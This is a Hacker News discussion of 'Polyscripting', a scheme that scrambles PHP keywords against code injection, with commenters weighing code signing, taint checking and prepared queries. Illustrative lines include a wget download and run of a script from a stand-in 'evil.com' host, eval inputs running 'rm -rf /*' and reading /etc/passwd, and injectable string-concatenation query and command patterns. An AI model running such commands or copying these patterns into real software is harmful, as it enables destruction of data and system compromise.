
Polyscripting scrambles programming languages to prevent code injection - jkuria
https://blog.polyverse.io/introducing-polyscripting-the-beginning-of-the-end-of-code-injection-fe0c99d6f199
======
klodolph
This is a bandaid on a sucking chest wound, not a silver bullet. Traditional
defense in depth:

* Run web processes with minimum privileges

* No write access to the directories where your executable runs

* Audits for filesystem access and use of "eval"

* et cetera

The only reason we're entertaining this kind of idea is because people have
legacy apps written in PHP that they need to deal with and keep running. Fine,
but there are problems with this "polyscripting" approach... this looks
substantially worse than, say, doing something more straightforward like
signing your code with a cryptographic key and refusing to execute unsigned
code. In fact, this looks like a hackneyed, amateurish way of doing exactly
that, all while making the debugging experience immeasurably worse. Modifying
PHP to only execute signed code would surely be trivial by comparison.

This is a hack that doesn't even need to exist.

~~~
iforgotpassword
So let's get rid of the NX bit, aslr, heck why even run web processes with
minimum privileges as you suggest? Just write exploit free software and launch
them as root.

I don't see how this polyscripting thing is any better or worse than those
dozens of existing mitigation technologies, apart from your point about
debugging.

~~~
imtringued
The problem with this "mitigation" is that it doesn't solve the problem and it
takes away resources and attention from the proper solution. Checking a code
signature on file load is a proven mitigation for preventing the execution of
untrusted code.

~~~
joshuamorton
This doesn't help if the code you're executing changes after execution starts,
or if it is dynamically generated (a sql query).

------
kevingadd
Why go through all this trouble when you could just use code-signing? Only
load and run source or executable files with a trusted certificate. For more
robustness you generate a self-signed cert on the build server that no outside
parties have access to.

Dedicated interpreter/script pair is a cool idea, at least. The "impossible"
also seems like an overstatement to me - it doesn't seem hard to reverse
engineer the scramble that was applied, since there are frequently ways to get
the ability to read the raw source of the file being executed (certainly
against PHP), and if you can match it against a known source file (easy for
open source libraries) you can use that 1:1 mapping to identify what scramble
was used. Common code patterns show up all the time in source, and since the
scramble preserves literals and structure it will be easy to identify the
scrambled token based on the pattern.
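
A rough sketch of that matching step, in Python for brevity. It assumes the attacker has the scrambled file plus the matching original, and that the scramble only renames keywords. The sample snippets and every scrambled name except arFktyO (which is the blog's own example for echo) are made up for illustration:

```python
import re

# Hypothetical inputs: a snippet of known open-source code and the same
# snippet as it might look after a keyword scramble. Only arFktyO = echo
# comes from the blog post; the other scrambled names are made up.
KNOWN = 'if ($x) { echo "hi"; } else { return $y; }'
SCRAMBLED = 'qZpw ($x) { arFktyO "hi"; } mmLke { tRbnx $y; }'

# String literals, $variables, bare words, then any single punctuation mark.
TOKEN = re.compile(r'"[^"]*"|\$\w+|\w+|[^\s\w]')


def recover_mapping(known, scrambled):
    """Align the two token streams and record each position that differs."""
    plain, scram = TOKEN.findall(known), TOKEN.findall(scrambled)
    if len(plain) != len(scram):
        raise ValueError("token counts differ; these are not the same file")
    return {s: p for p, s in zip(plain, scram) if p != s}


mapping = recover_mapping(KNOWN, SCRAMBLED)
for scrambled_word, keyword in mapping.items():
    print(scrambled_word, "->", keyword)
```

Because literals, variables and punctuation survive the scramble, the token streams line up one to one and every differing position gives away one keyword.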

The sad thing is even if this ends up being a great defensive technique,
deploying it in practice would be a real pain because you're not running
known-good packages or installers anymore, you have to build your own
dedicated runtime/interpreter from scratch to match the scramble on your
application. To avoid high risk, you probably need to change the scramble
regularly, which means building the interp again. And if you use a different
scramble per application (for sandboxing, etc) then you aren't getting page
sharing between the native modules. :(

~~~
stevekemp
>Only load and run source or executable files with a trusted certificate

This kind of solution works well with the exception of pretty much any
scripting-language. For example I hacked up a cute linux security module to
allow executions by the kernel to be validated via userspace:

https://github.com/skx/linux-security-modules/tree/master/security/can-exec

You could also use SELinux, AppArmor, and similar traditional approaches. Once
you've picked a solution you could then go on to sign `/bin/ls`, `/bin/bash`,
etc, and deny the execution of unsigned binaries such that this would fail:

    
    
         wget evil.com/root.sh
         chmod 755 root.sh
         ./root.sh
    

(This example assumes that you'd even permit `wget` and `chmod` to run.)

However the approach fails if you want to allow running perl, php, python
scripts, etc. You'd have to sign the interpreters so that they could run. But
if you allow `python` to execute then there is no difference between:

    
    
          python /path/to/good.py
    

and

    
    
          python /path/to/evil.py
    

Since the executable in both cases is `python`, not the script. You'd have to
hack the interpreters to do signature validation on your scripts - and if you
did that you'd almost certainly need to update all the standard-libraries to
allow those to be loaded.

(It is possible you could work around this via policies, but off the top of my
head ..)

~~~
kevingadd
You'd codesign the scripts, yeah. I've done that before when using an
interpreter. It's not trivial but all the major script runtimes that matter
have relevant embedding hooks to let you do it.
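
To make the idea concrete, here is a minimal sketch of "verify, then execute" in Python. It is not any runtime's actual hook. It swaps the certificate for a shared-secret HMAC to stay inside the standard library, and SIGNING_KEY, sign and run_if_signed are names invented for this example:

```python
import hashlib
import hmac

# Assumption: this key exists only on the build server and in the runtime's
# protected config. A real deployment would more likely use public-key
# signatures so the runtime never holds a signing secret.
SIGNING_KEY = b"hypothetical-build-server-key"


def sign(source, key=SIGNING_KEY):
    """Return a hex HMAC-SHA256 tag for the script bytes (build-server side)."""
    return hmac.new(key, source, hashlib.sha256).hexdigest()


def run_if_signed(source, tag, key=SIGNING_KEY):
    """Execute the script only if its tag matches; return its globals."""
    if not hmac.compare_digest(sign(source, key), tag):
        raise PermissionError("refusing to execute unsigned or modified code")
    namespace = {}
    exec(compile(source, "<signed-script>", "exec"), namespace)
    return namespace


good = b"result = 6 * 7\n"
tag = sign(good)
print(run_if_signed(good, tag)["result"])

evil = b"result = 'pwned'\n"
try:
    run_if_signed(evil, tag)  # reuses the tag from the good script
except PermissionError as err:
    print(err)
```

The same check would have to sit in front of every module load, not just the entry script, for this to mean anything.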

~~~
stevekemp
Presumably you'd need to do more than sign/check the script running as the
argument though?

For example:

    
    
         #!/usr/bin/perl
         use module;
         print "OK\n";
    

The module could have been modified by a local user too - so you need to check
all libraries that are included/opened too? That would seem to be a lot of
work.

------
phyzome
Orrrrr you could systemically remove code injection vulnerabilities, which
honestly aren't that hard to get rid of. Why play around with weird little
hacks like this if you can remove the problem at its root?

Just say no to string concatenation of command languages.
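
For shelling out, that can be as simple as handing the OS an argument list instead of a command string. A small Python sketch follows. The child Python process is only a stand-in for a real command such as ls, and list_argument is a name made up here:

```python
import subprocess
import sys


def list_argument(user_input):
    """Pass user input as a single argv entry; no shell ever parses it."""
    # A child Python process stands in for a real command such as `ls`.
    # It simply prints back the one argument it received.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", user_input],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.rstrip("\n")


hostile = "docs; echo INJECTED"
print(list_argument(hostile))
```

The semicolon arrives in the child as plain data because no shell is involved to interpret it.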

------
mncharity
I once served a mostly-unmaintained world-writable wiki. It was getting hosed
by automated link spam. Simply renaming the "edit" url to "ed1t", solved the
problem for several years. It forced a human to eyeball the site, and thus to
notice its high-profile warning that "robots.txt blocks indexing, so link
spamming won't be of any use to you". Eventually someone started spamming
anyway... which eventually obscured the warning... and the site was then
trashed. Sometimes even a very small work function can be quite useful.

------
nneonneo
I don’t understand how this “prevents code injection” in any meaningful way.
The blog post boasts on and on about how it’s going to solve the problem - but
at the end of the day, a code injection bug is still a code injection bug.
Sure, the attacker now has to program in a demented, randomized dialect of
PHP, but given enough patience they’re bound to get something usable running.

Plus this breaks practically any code that actually relies on dynamic PHP
features to generate code, because now the code generators have to be manually
edited to spit out obfuscated code instead of normal PHP.

------
ben509
> Once php is scrambled and the files transformed, there is no key or magic
> value to find that will reverse the process.

Isn't scrambled code standard practice when you're writing PHP?

(I keed, I keed...)

~~~
sli
No no, that would be Perl.

~~~
rbanffy
Perl code is a one-way hash of the program steps.

------
chubot
Uh, so doesn't this only prevent PHP injection? To prevent SQL injection you
would need to change the database itself; to prevent JavaScript injection you
would need to change the browser (impossible), etc.

~~~
stcredzero
_To prevent SQL injection_

Prepared queries?
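
A quick sketch with Python's built-in sqlite3 module. The items table and its contents are invented for the example:

```python
import sqlite3

# Hypothetical schema and rows, just enough to run a query against.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE items (owner TEXT, thing TEXT)")
conn.executemany(
    "INSERT INTO items VALUES (?, ?)",
    [("alice", "laptop"), ("bob", "phone")],
)


def things_owned_by(owner):
    """Bind user input as a parameter so it is never parsed as SQL."""
    rows = conn.execute("SELECT thing FROM items WHERE owner = ?", (owner,))
    return [thing for (thing,) in rows]


print(things_owned_by("alice"))
print(things_owned_by("alice' OR '1'='1"))  # treated as a literal owner name
```

The classic quote-breaking payload matches no rows, since the driver compares it against the owner column as an ordinary string.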

~~~
CGamesPlay
> Prepared queries?

Well, there are lots of ways to prevent code injection that aren't "scrambling
the AST". But to "polyscript" your SQL, you have to modify your SQL engine.

~~~
stcredzero
I am thinking of using something like this to enable serverless lambdas, but
in ahead of time compiled languages.

------
duckerude
> Within the tests/evalExploit directory, there is a php file that runs eval()
> on user input, a common code-injection vulnerability, to experience the
> power of Polyscripting.

What happens if you eval "`rm -rf /*`;" or "`grep root /etc/passwd`;"? Does it
scramble backticks?

~~~
notveryrational
I doubt it scrambles backticks. In its example on the webpage it just creates
a keyword scrambler. The grammar stays intact, along with most of the lexing.
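
A toy version of such a keyword scrambler, sketched in Python. This is a guess at the general shape, not Polyscripting's actual implementation, and the keyword list is a small illustrative subset:

```python
import re
import secrets
import string

# Illustrative subset only, not PHP's full keyword list.
KEYWORDS = ("echo", "if", "else", "return")

# Quoted strings, backtick spans and $variables are matched first so they
# pass through untouched; then bare words; then any other single character.
TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|`[^`]*`|\$\w+|\w+|\W')


def make_scramble(keywords=KEYWORDS, length=7):
    """Pick a distinct random replacement word for every keyword."""
    table, used = {}, set()
    for kw in keywords:
        word = kw
        while word in keywords or word in used:
            word = "".join(secrets.choice(string.ascii_letters) for _ in range(length))
        used.add(word)
        table[kw] = word
    return table


def scramble(source, table):
    """Rename keywords token by token; everything else is copied verbatim."""
    return "".join(table.get(tok, tok) for tok in TOKEN.findall(source))


table = make_scramble()
print(scramble('echo `grep root /etc/passwd`; echo "if";', table))
```

In this sketch the backtick span comes out byte for byte unchanged, so an injected shell command would not need to know the scramble at all.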

------
tetrep
TL;DR: This doesn't really do what it claims to do (prevent injection), but it
does _slightly_ mitigate _some_ attack vectors. It's security through
obscurity, which is useful as defense in depth (see: ASLR), but hardly stops
all attacks (or even a motivated attacker). If someone ran around declaring
the end of buffer overflow exploits because of ASLR, I'd have a hearty
chuckle.

    
    
        root:/pwd# cat scrambled.php
        <?php
        arFktyO "Hello, ";
        arFktyO "Small World.\n";
        ?>
    

In the above example, arFktyO = echo. This doesn't fix (imo) the most common
instance of [something]-injection, which usually stems from string
concatenation, i.e.

    
    
        sqlQuery = "SELECT * FROM table WHERE owner=" + userInput
        execute(sqlQuery)
    

or

    
    
        command = "ls " + userInput
        eval(command)

~~~
ben509
You don't need a particularly advanced DBMS to create a schema with views that
have scrambled names, or just stored procedures with scrambled names.

    
    
        CREATE VIEW oijweojf AS SELECT thing AS woeifj, stuff AS pokkx 
    

Similarly, if you're shelling out, you can certainly set up a chroot jail with
all the names scrambled.

That said, you then need to integrate all this into a build and deploy
process, and god help anyone who has to debug it.

~~~
hyperhopper
Scrambling those names is equivalent to scrambling variable names. The actual
use of this tool would be the equivalent of scrambling `CREATE VIEW` to `kdjal
fjdskalf`

------
csirac2
I wish folks would use the taint mode they might already have. At some point
taint checking bugs stopped being release blockers in core ruby & perl, but
having worked through moving a couple of large codebases to surviving strict
taint checking in prod, it's one of the most memorable systematic things we
have for avoiding most (I think?) of the bugs in the class that this is trying
to solve.

Obviously, we want solutions that will remediate existing code unmodified, and
I guess enabling taint mode isn't in that category.

I wonder what bugs taint checking wouldn't catch, that this would.

------
tomc1985
The name of this "technique" is a marketing grab. "Polyscripting" means
something that is not this, on its own.

------
codedokode
It looks like a solution to a very rare case - using eval on user input (who
does that?). It doesn't protect you from more popular SQL injections, XSS,
XSRF vulns etc.

A better use would be obfuscation of code to lock clients to your services.

------
rs86
The PR stink is strong with this one.

